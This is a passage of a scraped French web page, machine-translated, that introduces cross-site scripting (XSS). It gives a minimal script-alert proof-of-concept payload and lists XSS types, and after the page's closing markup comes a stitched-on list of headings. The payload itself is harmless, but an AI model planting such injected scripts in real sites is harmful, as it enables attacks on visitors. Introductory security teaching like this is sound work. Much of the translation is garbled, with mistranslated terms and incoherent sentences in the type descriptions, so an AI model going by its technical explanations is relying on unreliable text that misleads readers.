entré.</p> <p>Un script intersight s'appelle une injection qui implémente le code qui effectuera des actions dans le navigateur pour le compte du site Web. Cela peut se produire à la fois avec la notification de l'utilisateur et en arrière-plan, sans sa connaissance.</p> <p><b>Figure 2. Schéma visuel du script inter-sites</b></p> <p><img src='https://i0.wp.com/anti-malware.ru/files/xss-example-flow-diagram1.png' width="100%" loading=lazy loading=lazy></p> <p>Comme exemple le plus simple, vous pouvez apporter un script élémentaire montrant une fenêtre de notification. Cela ressemble à ceci:</p> <p><b>Tableau 1. Script, provoquant une fenêtre contextuelle</b></p> <p><script>alert(" ЭТО <span>XSS- </span>УЯЗВИМОСТЬ !!!")</script> </p> <p>Ce script appelle la fenêtre avec l'inscription "Ceci est XSS-Vulnérabilité !!!". Le navigateur de l'utilisateur perçoit et exécute ce script dans le cadre du code légitime du site.</p> <h2> Types de vulnérabilités XSS</h2> <p>Toutes les vulnérabilités XSS ne sont pas identiques, il y en a de nombreux types d'entre eux. Les types et les méthodes de leur interaction sont répertoriés ici:</p> <p><b>Figure 3. Types de vulnérabilités XSS</b></p> <p><b><br><img src='https://i2.wp.com/anti-malware.ru/files/sucuri-blog-xss-types.png' width="100%" loading=lazy loading=lazy></b></p> <p><b>Vulnérabilités causées par le code sur le côté serveur (Java, PHP, .NET, etc.):</b></p> <p>Attaques Traditionnelles XSS:</p> <ol><li>Réfléchie (non permanent). L'attaque XSS réfléchie est déclenchée lorsque l'utilisateur passe à un lien spécialement préparé. Ces vulnérabilités apparaissent lorsque les données fournies par le client Web sont le plus souvent dans les paramètres de requête HTTP ou sous la forme de HTML sont exécutées directement par des scripts de serveur à l'analyse syntaxique et affichent la page de résultats de ce client, sans traitement correct.</li> <li>Stocké (constant). Les XSS stockés sont possibles lorsqu'un attaquant parvient à mettre en œuvre un code malveillant sur le serveur, en cours d'exécution dans le navigateur chaque fois lors de l'accès à la page d'origine. L'exemple classique de cette vulnérabilité est des forums sur lesquels il est autorisé à laisser des commentaires au format HTML.</li> </ol><p><b>Vulnérabilités causées par le code du côté du client (JavaScript, Visual Basic, Flash, etc.):</b></p> <p>Également connu sous le nom de modèles DOM:</p> <ol><li>Réfléchie (non permanent). Les mêmes que dans le cas du serveur, uniquement dans ce cas, l'attaque est possible en raison du fait que le code est traité par le navigateur.</li> <li>Stocké (constant). Semblable au stockage de XSS sur le côté serveur, uniquement dans ce cas, le composant malveillant est enregistré du côté du client à l'aide du stockage du navigateur.</li> </ol><p><b>Vulnérabilités causées par l'infrastructure (navigateur, plugins, serveurs, etc.):</b></p> <p>Il y a très rare, mais sont plus dangereux:</p> <ol><li>Infrastructure du côté du client. Il arrive lorsque le composant malveillant rend toute manipulation avec la fonctionnalité du navigateur, par exemple avec son filtre XSS, etc.</li> <li>Infrastructure sur le côté serveur. Il se produit lorsque le serveur Web traite de manière incorrecte les demandes, leur permettant de les modifier.</li> <li>Rapporter. Il est possible qu'il est possible de mettre en œuvre en contact entre le client et le serveur.</li> </ol><p><b>Vulnérabilités causées par l'utilisateur:</b></p> <ol><li>Auto-xss. Cela arrive souvent à la suite d'un ingénierie sociale lorsque l'utilisateur lance accidentellement le code malveillant dans son navigateur.</li> </ol><h2> Quel est le danger de XSS?</h2> <p>Comment puis-je protéger votre site de XSS? Comment vérifier le code de vulnérabilité? Il existe des technologies comme le pare-feu Sucuri spécialement conçu pour éviter des attaques similaires. Mais si vous développez, vous voudrez certainement en savoir plus sur la manière d'identifier et d'éliminer les vulnérabilités du XSS. Nous en parlerons dans la partie suivante de l'article XSS.</p> <script type="text/javascript">  </script><br> <br> <script>document.write("<img style='display:none;' src='//counter.yadro.ru/hit;artfast_after?t44.1;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";h"+escape(document.title.substring(0,150))+ ";"+Math.random()+ "border='0' width='1' height='1' loading=lazy loading=lazy>");</script> </div> </article> <div class="post-share"> <div class="post-share__title">Avez-vous aimé l'article? Partagez-le</div> <script src="//yastatic.net/share/share.js"></script><div class="yashare-auto-init" data-yashareL10n="ru" data-yashareType="small" data-yashareQuickServices="vkontakte,facebook,twitter,odnoklassniki,moimir" data-yashareTheme="counter"></div> </div> <div style="text-align: center; margin-top: 10px; margin-bottom: 50px; " id="sovet-1558718318" data-cfpa="13825"><div style="clear: both; font:16px/44px 'Ubuntu', sans-serif; display:inline-block;"> </div></div><script type="text/javascript">;new advadsCfpAd( 13825 );</script> <div class='yarpp-related'> <div class="related-items"> <div class="headline">Articles recommandés sur le sujet</div> <div class="items"> <div class="item"> <div class="item__inner"> <a class="item__title" href="https://newtravelers.ru/fr/tips/tehnologiya-izmereniya-ferromagnitnymi-zondami-magnitometriya-v-prosteishem-variante-ferrozond-sostoit.html"><img src="/uploads/a567b1fe157c9401f3de05cde7acb9ae.jpg" width="200" height="200" alt="Magnétométométrie dans la version la plus simple que le ferrozond consiste en un noyau ferromagnétique et deux bobines sur elle" class="item__image" / loading=lazy loading=lazy>Magnétométométrie dans la version la plus simple que le ferrozond consiste en un noyau ferromagnétique et deux bobines sur elle</a> <div class="item__comments"></div> </div> </div> <div class="item"> <div class="item__inner"> <a class="item__title" href="https://newtravelers.ru/fr/asus/intensivnyi-kurs-po-poisku-raboty-effektivnyi-poisk-raboty-kurs-po.html"><img src="/uploads/653f224afa414d6b546a047b21ade39c.jpg" width="200" height="200" alt="Recherche efficace de recherche d'emploi" class="item__image" / loading=lazy loading=lazy>Recherche efficace de recherche d'emploi</a> <div class="item__comments"></div> </div> </div> <div class="item"> <div class="item__inner"> <a class="item__title" href="https://newtravelers.ru/fr/the-lg-tvs/fotodiody-princip-raboty-osnovnye-harakteristiki-osnovnye.html"><img src="/uploads/a1489013baec95aba72bad70ad2a99f5.jpg" width="200" height="200" alt="Les principales caractéristiques et paramètres de la photodiode" class="item__image" / loading=lazy loading=lazy>Les principales caractéristiques et paramètres de la photodiode</a> <div class="item__comments"></div> </div> </div> </div> </div> </div> <div style="text-align: center; margin-top: 30px; margin-bottom: 30px; " id="sovet-1702503440" data-cfpa="18987"><style type="text/css"> .gadsense_slot_2{ display: inline-block; width: 746px; height: 300px;} @media (min-width:300px) { .gadsense_slot_2 { width: 300px; height: 300px; } } @media (min-width:800px) { .gadsense_slot_2 { width: 600px; height: 300px; } } @media (min-width:1024px) { .gadsense_slot_2 { width: 746px; height: 300px; } } </style> </div><script type="text/javascript">;new advadsCfpAd( 18987 );</script> </main> <aside class="sidebar"> <div class="subs"> <div class="subs-soc"> <div class="subs-soc-title">Rejoignez social. Réseaux</div> <ul> <li><a href="https://facebook.com/" target="_blank" class="fb">Facebook.</a></li> <li><a href="https://twitter.com/" target="_blank" class="twi">Twitter.</a></li> <li><a href="" target="_blank" class="vk">En contact avec</a></li> <li><a href="" target="_blank" class="ok">Odnoklassniki.</a></li> <li><a href="https://youtube.com/" target="_blank" class="yt">Youtube.</a></li> </ul> </div> </div> <div class="section section--companies"> <div class="headline center">Matériaux populaires</div> <ul> <li><a href="https://newtravelers.ru/fr/iphoneipad/specialnost-zashchita-informacii-gde-rabotat-professiya---specialist-po.html" ><img src="/uploads/46c6a7e09a42442c3eaa9b7d93fbbce8.jpg" width="74" height="74" alt="Profession - Spécialiste de la sécurité de l'information" / loading=lazy loading=lazy><span>Profession - Spécialiste de la sécurité de l'information</span></a></li> <li><a href="https://newtravelers.ru/fr/android/umenshaem-razmer-pdf-redaktirovanie-izmenenie-razmerov-i-pechat.html" ><img src="/uploads/a4f42dcaad458b3b3500d41a2ed4f177.jpg" width="74" height="74" alt="Modification, redimensionnement et impression PDF Agrandir le fichier PDF" / loading=lazy loading=lazy><span>Modification, redimensionnement et impression PDF Agrandir le fichier PDF</span></a></li> <li><a href="https://newtravelers.ru/fr/d-link/skorost-1-megabit-kakaya-skorost-domashnego-interneta-nuzhna-vam-na-samom-dele.html" ><img src="/uploads/bf13c6de624891f9dd8df6ceaade7b3b.jpg" width="74" height="74" alt="Quelle est la vitesse de la maison Internet besoin de vous vraiment" / loading=lazy loading=lazy><span>Quelle est la vitesse de la maison Internet besoin de vous vraiment</span></a></li> <li><a href="https://newtravelers.ru/fr/tenda/bystryi-prosmotr-failov-cdw-v-total-commander-prosmotr-kartinok-total-commander.html" ><img src="/uploads/bfbae1d1107fb514872478dcd97c539a.jpg" width="74" height="74" alt="Voir les images du commandant total" / loading=lazy loading=lazy><span>Voir les images du commandant total</span></a></li> <li><a href="https://newtravelers.ru/fr/iphoneipad/bystryi-prosmotr-failov-cdw-v-total-commander-prosmotr-kartinok-total-commander-bystrye.html" ><img src="/uploads/ba8bc2f6519da65408779736622829e8.jpg" width="74" height="74" alt="Voir les images du commandant total" / loading=lazy loading=lazy><span>Voir les images du commandant total</span></a></li> </ul> </div> <nav class="section section--calc"> <div class="headline center">Nouveau sur le site</div> <ul> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://newtravelers.ru/fr/problems/skachat-cat-programmu-dlya-perevodov-kak-rabotaet-perevodchik-frilanser.html">Comment fonctionne le traducteur indépendant</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://newtravelers.ru/fr/wireless/kak-konvertirovat-peredelat-preobrazovat-shemu-iz-visio-v.html">Document sur les schémas de processus Visio dans Word Contour Impression Visio Visio</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://newtravelers.ru/fr/setting/podtverzhdenie-o-prochtenii-pisma-outlook-nastraivaem-v-microsoft-outlook-chtenie.html">Personnaliser dans Microsoft Outlook Messages de lecture et notifications</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://newtravelers.ru/fr/setting/eksport-tochek-v-txt-iz-chertezha-autocad-eksport-koordinat-iz-cad-v-txt.html">Coordonnées d'exportation de CAD à TXT</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://newtravelers.ru/fr/setting/universalnyi-perevodchik-v-odin-klik-pyat-besplatnyh-programm-dlya-bystrogo.html">En un clic: cinq programmes gratuits pour des traductions rapides des textes</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://newtravelers.ru/fr/wireless/excel-kodirovka-csv-vybor-kodirovki-teksta-pri-otkrytii-i-sohranenii-failov-kak.html">Sélectionnez le code de texte lorsque vous ouvrez et enregistrez des fichiers</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://newtravelers.ru/fr/bluetooth/sozdanie-ukazatelya-terminov-kak-v-word-ustanovit-dlya-proverki-pravopisaniya.html">Comment installer pour vérifier l'orthographe en utilisant uniquement le dictionnaire principal comment faire des termes brillants en mots</a></li> </ul> <div class="section--calc__all"> </div> </nav> </aside> </div> <div class="popular popular-in-cat"> <div class="headline center" id="stop_ads">Les visiteurs discutent actuellement</div> <div class="items"> <div class="item"> <div class="item__inner"> <a class="item__title" href="https://newtravelers.ru/fr/wireless/kak-redaktirovat-pdf-luchshie-besplatnye-programmy-kak-redaktirovat-pdf.html"><img src="/uploads/45e4fe56a2dda003d656a77ac96741b8.jpg" width="200" height="200" alt="Comment éditer PDF (cinq applications pour modifier les fichiers PDF) Comment supprimer des pages individuelles de PDF" class="item__image" / loading=lazy loading=lazy>Comment éditer PDF (cinq applications pour modifier les fichiers PDF) Comment supprimer des pages individuelles de PDF</a> <a class="item__cat" href="https://newtravelers.ru/fr/category/wireless/">Sans fil</a> <div class="item__comments"></div> </div> </div> <div class="item"> <div class="item__inner"> <a class="item__title" href="https://newtravelers.ru/fr/iphoneipad/otkrytye-okna-na-paneli-zadach-ne-razvorachivayutsya-v-windows-reshenie.html"><img src="/uploads/d29077e38668e708badbe639bf9c8573.jpg" width="200" height="200" alt="Pourquoi la fenêtre du programme à feu est-elle longue?" class="item__image" / loading=lazy loading=lazy>Pourquoi la fenêtre du programme à feu est-elle longue?</a> <a class="item__cat" href="https://newtravelers.ru/fr/category/iphoneipad/">iPhone / iPad.</a> <div class="item__comments"></div> </div> </div> <div class="item"> <div class="item__inner"> <a class="item__title" href="https://newtravelers.ru/fr/problems/dxf2txt-eksport-i-perevod-teksta-iz-autocad-dxf2txt-eksport-i-perevod-teksta-iz-autocad.html"><img src="/uploads/28e0489a34cd55f527ec88cff5cab0b7.jpg" width="200" height="200" alt="DXF2TXT - Exportation et traduction du texte de AutoCAD pour afficher un point de circulation DWG en TXT" class="item__image" / loading=lazy loading=lazy>DXF2TXT - Exportation et traduction du texte de AutoCAD pour afficher un point de circulation DWG en TXT</a> <a class="item__cat" href="https://newtravelers.ru/fr/category/problems/">Problèmes</a> <div class="item__comments"></div> </div> </div> <div class="item"> <div class="item__inner"> <a class="item__title" href="https://newtravelers.ru/fr/setting/propadaet-kursor-v-vorde-chto-delat-chto-delat-esli-propal-kursor-myshi-pochemu.html"><img src="/uploads/d18ebaef8d272fa8057baa4ed27740e7.jpg" width="200" height="200" alt="Que faire si le curseur de la souris disparaît" class="item__image" / loading=lazy loading=lazy>Que faire si le curseur de la souris disparaît</a> <a class="item__cat" href="https://newtravelers.ru/fr/category/setting/">Réglage</a> <div class="item__comments"></div> </div> </div> </div> </div> <footer class="footer"> <div class="footer__copyright"> <div class="footer__logo">newTravelers.ru.</div> <p>© 2021 - NewTravelers.ru</p> <p>Conseils pour configurer Android, routeurs, Smart TV. Bluetooth</p> </div> <nav class="footer__nav-1"><ul> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://newtravelers.ru/fr/category/problems/">Problèmes</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://newtravelers.ru/fr/category/android/">Android</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://newtravelers.ru/fr/category/setting/">Réglage</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://newtravelers.ru/fr/category/error/">les erreurs</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://newtravelers.ru/fr/category/setting/">Réglage</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://newtravelers.ru/fr/category/bluetooth/">Bluetooth</a></li> </ul></nav> <div class="footer__nav-2"> <nav><ul> <li class="menu-item type-post_type object-page "><a href="">Contacts</a></li> <li class="menu-item type-post_type object-page "><a href="">Publicité sur le projet</a></li> <li class="menu-item type-post_type object-page "><a href="https://newtravelers.ru/fr/sitemap.xml">Plan du site</a></li> <li class="menu-item type-post_type object-page "><a href="">Copyright et règles</a></li> </ul></nav> <ul class="footer__soc"> <li><a href="" target="_blank" class="vk">En contact avec</a></li> <li><a href="" target="_blank" class="ok">Odnoklassniki.</a></li> <li><a href="https://facebook.com/" target="_blank" class="fb">Facebook.</a></li> <li><a href="https://twitter.com/" target="_blank" class="twi">Twitter.</a></li> </ul> </div> <div class="footer-right"> <div class="footer__counters" id="text-6"> <div class="textwidget"><p></p> </div> </div> <div class="footer__orphus"> <div>Notre erreur sur le site? Mettez-la en surbrillance et appuyez sur Ctrl + Entrée</div> </div> </div> </footer> </div> </div> <script type="text/javascript">jQuery(function($) { $(document).on("click", ".pseudo-link", function(){ window.open($(this).data("uri")); } );} );</script><script type='text/javascript' src='https://newtravelers.ru/wp-content/themes/sovet-ingenera_adapt/js/baron.min.js'></script> <script type='text/javascript' src='/assets/scripts1.js'></script> <script type='text/javascript' src='/wp-includes/js/comment-reply.min.js'></script> <script type='text/javascript' src='https://newtravelers.ru/wp-content/plugins/contact-form-7/includes/js/scripts.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var tocplus = { "smooth_scroll":"1"} ; /* ]]> */ </script> <script type='text/javascript' src='https://newtravelers.ru/wp-content/plugins/table-of-contents-plus/front.min.js'></script> <script type='text/javascript'> var q2w3_sidebar_options = new Array(); q2w3_sidebar_options[0] = { "sidebar" : "fixed-sidebar", "margin_top" : 0, "margin_bottom" : 0, "stop_id" : "stop_ads", "screen_max_width" : 0, "screen_max_height" : 0, "width_inherit" : false, "refresh_interval" : 1500, "window_load_hook" : false, "disable_mo_api" : false, "widgets" : ['text-7'] } ; </script> <script type='text/javascript' src='https://newtravelers.ru/wp-content/plugins/q2w3-fixed-widget/js/q2w3-fixed-widget.min.js'></script> <script type='text/javascript' src='https://newtravelers.ru/wp-content/plugins/wp-featherlight/js/wpFeatherlight.pkgd.min.js'></script> <script type='text/javascript' src='/wp-includes/js/wp-embed.min.js'></script> <script async="async" type='text/javascript' src='https://newtravelers.ru/wp-content/plugins/akismet/_inc/form.js'></script> <script type="text/javascript">  </script><br> <br> </body> </html>

La formation d'attaque XSS. Vulnérabilité XSS - Qu'est-ce que c'est? Exemples de vulnérabilités XSS. Données de formulaires remplis

Types de XSS.

Caractéristiques XSS basées sur DOM

Auditeur XSS

Exemples d'exploitation de XSS.

Programmes de recherche et de recherche de la vulnérabilité XSS

XSS: Vulnérabilité d'injection

Attaques Traditionnelles XSS:

Réfléchie (non permanent).

Stocké (constant).

Vulnérabilités causées par le code du côté du client (JavaScript, Visual Basic, Flash, etc.):

Également connu sous le nom de modèles DOM:

Réfléchie (non permanent).

Stocké (constant).

Exemples de vulnérabilités XSS.

Biscuits